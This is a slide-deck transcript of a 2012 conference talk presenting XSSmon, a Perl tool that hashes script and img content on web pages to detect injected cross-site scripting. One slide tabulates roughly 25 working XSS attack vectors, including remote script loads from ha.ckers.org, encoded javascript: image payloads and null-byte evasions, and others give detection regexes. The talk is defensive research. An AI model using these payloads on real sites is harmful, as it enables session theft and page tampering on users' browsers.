XSSmon: A PerlBased IDS for theDetection ofPotential XSSAttacksChristopher M. Frenz
Cross Site Scripting Cross  Site Scripting (XSS) entails the  injection of a malicious script into a Web  site so that wh...
Common XSS Defenses   Escaping     Converting < to &lt to render content contained      in <script></script> tags non-ex...
Project Goal Thisstudy does not seek to build on the  existing methods of XSS prevention and  mitigation, but rather seek...
Hashes One way cryptographic function in which each input should yield a unique output
Hash Examples#!usr/bin/perluse Digest::SHA1 qw(sha1sha1_hex sha1_base64);$digest =sha1_hex(password);print "$digestnn";$di...
Tripwire   Tripwire works by having the application user    select critical system files and computing a hash of    those...
XSSmon IDS   This XSS IDS is a variation of the theme laid forth in    tripwire in that it seeks to use regular expressio...
XSSmon Methods   It is the intention of this application to only recognize    potentially executable content, so that “ha...
HTML Page with ExecutableContent                Potentially                            executable                         ...
Test #1   To test the efficacy of the IDS system, three    identical Web pages (XSSTest, XSSTest2, XSSTest3)    are initi...
Test1: Initial Hash Values                             The three                             identical                    ...
Test 1 Continued   The 3 HTML files will be modified as follows:       the XSSTest.html file will have additional       ...
Test 1 Results
Test 1 Conclusions   The Web page with additional executable    content was detected   Those without additional executab...
Test 2 The  IDS was then further tested by  determining how well it picks up a large  variety of XSS attack vectors Each...
Det                                                   XSS Attack Vector                                             ecte  ...
Test 2 Conclusions Inall but one case the hash values for the  html pages changed, demonstrating the  efficacy of the IDS...
Overall Conclusion   While the XSS IDS presented in this manuscript is still at a    stage where much more rigorous testi...
Upcoming SlideShare
Loading in...5
×

XSSmon: A Perl Based IDS for the Detection of Potential XSS Attacks

971

Published on

Talk presented at the 2012 IEEE LISAT Conference

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
971
On Slideshare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

XSSmon: A Perl Based IDS for the Detection of Potential XSS Attacks

  1. 1. XSSmon: A PerlBased IDS for theDetection ofPotential XSSAttacksChristopher M. Frenz
  2. 2. Cross Site Scripting Cross Site Scripting (XSS) entails the injection of a malicious script into a Web site so that when a future user accesses the Web site, the script is executed by the browser of the client machine In OWASP’s 2010 survey of the 10 greatest application security risks, injection attacks were ranked #1 and XSS attacks were ranked as #2
  3. 3. Common XSS Defenses Escaping  Converting < to &lt to render content contained in <script></script> tags non-executable Validation  Whitelisting  (s?(?d{3})?[-s.]?d{3}[-.]d{4})  Blacklisting  ((%3C)|<).*?((%3E)|>)
  4. 4. Project Goal Thisstudy does not seek to build on the existing methods of XSS prevention and mitigation, but rather seeks to take advantage of the ability of regular expressions to detect XSS elements as a means of developing a XSS intrusion detection system, in order to allow the detection of any breached XSS defenses.
  5. 5. Hashes One way cryptographic function in which each input should yield a unique output
  6. 6. Hash Examples#!usr/bin/perluse Digest::SHA1 qw(sha1sha1_hex sha1_base64);$digest =sha1_hex(password);print "$digestnn";$digest =sha1_hex(pas$word);print "$digestnn";$digest =sha1_hex(passw0rd);print "$digestnn";
  7. 7. Tripwire Tripwire works by having the application user select critical system files and computing a hash of those system files to establish a baseline At some future point in time, the hashes of those selected files can be recomputed If the file was not modified in any way the hash value that pertains to the file will remain unchanged If a recomputed hash value is found to differ from the baseline value, it is indicative that the file has in some way been modified, which could be indicative of a potential attack on the system
  8. 8. XSSmon IDS This XSS IDS is a variation of the theme laid forth in tripwire in that it seeks to use regular expressions to identify all of the possible client side executable content in a Web page  Script Regex  ((<|%3C)(s|%73|%53)(c|%63|%43)(r|%72%5 2)(i|%69|%49)(p|%70|%50)(t|%74%54).*?(<| %3C)(/|%2F)(s|%73|%53)(c|%63|%43)(r|%72 %52)(i|%69|%49)(p|%70|%50)(t|%74%54)(>| %3E))  Img Regex  ((<|%3C)(i|%69|%49)(m|%6D|%4D)(g|%67| %47).*?(>|%3E))
  9. 9. XSSmon Methods It is the intention of this application to only recognize potentially executable content, so that “harmless” content, such as plain non-executable text enclosed in <p> tags and the like, do not trigger the system every time they are added to a page The IDS can be presented with a list of Web page links to monitor, and will use the regular expressions to globally match all of the content encapsulated in a <script> or <img> tags All of this content is then concatenated together into a string that contains all the content recognized as potentially executable and the string passed through a SHA1 hash.
  10. 10. HTML Page with ExecutableContent Potentially executable content is extracted and used as input to SHA-1 hash At a later point in time the content will be re- extracted and put through the hash function again
  11. 11. Test #1 To test the efficacy of the IDS system, three identical Web pages (XSSTest, XSSTest2, XSSTest3) are initially created that contain a mixture of standard HTML tags and a simple JavaScript that displays the current date in the browser window These html pages are then uploaded to Apache Web server and the corresponding links input into the XSS IDS program The XSS IDS baseline module is then used to compute the SHA1 hash values of the executable content in the Web page present at each link
  12. 12. Test1: Initial Hash Values The three identical Web pages yield identical hash values
  13. 13. Test 1 Continued The 3 HTML files will be modified as follows:  the XSSTest.html file will have additional executable content added to it  the XSSTest2.html file will have additional html content added to it, but no additional client side executable content added  XSSTest3.html will remain unmodified as a control After the files are modified (as above) the module of the XSS IDS application that recomputes the hashes and performs comparisons to the values stored in the database will be executed
  14. 14. Test 1 Results
  15. 15. Test 1 Conclusions The Web page with additional executable content was detected Those without additional executable content did not trigger the IDS This would make the IDS useful for any type of Web forum or Web site that allows the posting of comments or other user content, since the IDS would not trigger false alarms for every addition to a Web page; only additions that match the potentially executable content patterns laid forth in the applications regular expressions
  16. 16. Test 2 The IDS was then further tested by determining how well it picks up a large variety of XSS attack vectors Each of these attack vectors was inserted into an html Web page whose baseline value had been previously computed After the insertion, the hashes were recomputed and compared to the baseline values
  17. 17. Det XSS Attack Vector ecte d <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Yes <IMG SRC="javascript:alert(XSS);"> Yes <img SRC=javascript:alert(jXSS)> Yes <IMG SRC=JaVaScRiPt:alert(XSS)> Yes <IMG SRC=javascript:alert(&quot;XSS&quot;)> Yes <IMG SRC=`javascript:alert("RSnake says, XSS")`> Yes <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> Yes <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> Yes <IMGSRC=javascript:alert('X Yes SS')> <IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058 Yes&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#00 00041> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x5 Yes 3&#x53&#x27&#x29> <IMG SRC="jav ascript:alert(XSS);"> Yes <IMG SRC="jav ascript:alert(XSS);"> Yes <IMG SRC="jav ascript:alert(XSS);"> Yes <IMG SRC="jav ascript:alert(XSS);"> Yes <IMG SRC="javascript:alert(XSS);"> - Each character on a new line Yes perl -e print "<IMG SRC=java0script:alert("XSS")>"; > out Yes perl -e print "<SCR0IPT>alert("XSS")</SCR0IPT>"; > out No <IMG SRC="  javascript:alert(XSS);"> Yes <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Yes <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> Yes <<SCRIPT>alert("XSS");//<</SCRIPT> Yes <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <SCRIPT SRC=//ha.ckers.org/.j> Yes <IMG SRC="javascript:alert(XSS)" Yes <SCRIPT>a=/XSS/ Yes alert(a.source)</SCRIPT> </TITLE><SCRIPT>alert("XSS");</SCRIPT> Yes
  18. 18. Test 2 Conclusions Inall but one case the hash values for the html pages changed, demonstrating the efficacy of the IDS against detecting XSS attacks The one XSS attack vector that went undetected contained a null character (0) in the script tag which made the tag unrecognizable to the IDS
  19. 19. Overall Conclusion While the XSS IDS presented in this manuscript is still at a stage where much more rigorous testing needs to be applied to it to see how well it detects XSS attacks against the breadth of all possible XSS attacks on a diversity of different Web pages, the proof of concept presented here is strongly suggestive that the creation of a XSS IDS is entirely feasible. Moreover, a robust XSS IDS would an excellent tool for Web application security, because no matter how securely written a piece of software bugs will still exist in it. An IDS such as this can help to mitigate the potential damage that could be unleashed by a bit of malicious XSS code slipping the a Web application’s input validation and escaping defenses by providing an early warning that such a condition exists.
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×